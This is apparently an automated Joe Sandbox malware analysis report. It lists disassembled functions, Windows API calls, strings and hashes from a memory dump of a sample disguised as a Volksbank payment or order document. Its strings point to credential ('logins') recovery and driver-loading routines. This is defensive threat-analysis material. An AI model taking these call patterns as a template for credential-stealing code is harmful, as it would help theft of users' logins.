                                                                                                                                                                                                                                          • API String ID: 2454223109-1580313836
                                                                                                                                                                                                                                          • Opcode ID: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                                                                          • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a77b9e8d0023a9b0013669bfcd7e150c1f61845d053eff75771d06e602164fa8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                                                                          Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                                                                          • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                                                                          • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,00002008,?,00000000,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                                                                          • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                                                                          • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                                                                          • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                                                                            • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                                                                            • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                                                                          • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                                                                          • API String ID: 4054529287-3175352466
                                                                                                                                                                                                                                          • Opcode ID: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                                                                                          • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8847399f9b9726e4c3d36038752de16191353ca0570e8d305bfc5bef64df017b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                                                                          Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                                                                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                                                                                          • API String ID: 3143752011-1996832678
                                                                                                                                                                                                                                          • Opcode ID: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                                                                                                          • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2285b8ceb197b06ade8a7456e1cd80ecea3148a8de1f9abac7666ee038ff1786
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                                                                                                                                                          Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                                          • API String ID: 667068680-2887671607
                                                                                                                                                                                                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                                                          Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                                          • API String ID: 1607361635-601624466
                                                                                                                                                                                                                                          • Opcode ID: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                                                                                                          • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5308ba8bd989b40c7668cc636176173edab96e663f2450d9c372c8e2c13fb1a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                                          Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                                          • Opcode ID: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                                                                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f43de039386cd0382df8450c395ac1cae23be0dcf7256b882f2abc90b2723d32
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                                                          Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1043902810-0
                                                                                                                                                                                                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                                          Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                                          • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                                          • Opcode ID: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19d6998bfdee0d99a36ebb4c1c86c750fd11cd17c22eb045823aea5ab7461c2f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                                          Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                            • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,00000000,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                                                                            • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                                            • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(0040DD4B,00000004,0040D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                                          • EnumResourceNamesW.KERNEL32(0040DD4B,00000005,0040D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                                          • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                                          • API String ID: 3330709923-517860148
                                                                                                                                                                                                                                          • Opcode ID: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                                                                          • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f76f60bccd3da85fbe49f53365f8b4a79ddd0aed292bd4a30626083a862f5199
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                                          Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                                          • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                                            • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                                            • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                                          • String ID: logins$null
                                                                                                                                                                                                                                          • API String ID: 2148543256-2163367763
                                                                                                                                                                                                                                          • Opcode ID: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                                                                          • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c5bf0fe86f5c58e26a0e15e1bc426e9e739ab0ab567f24c82d75e1353058837
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                                          Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                                          • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                                          • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
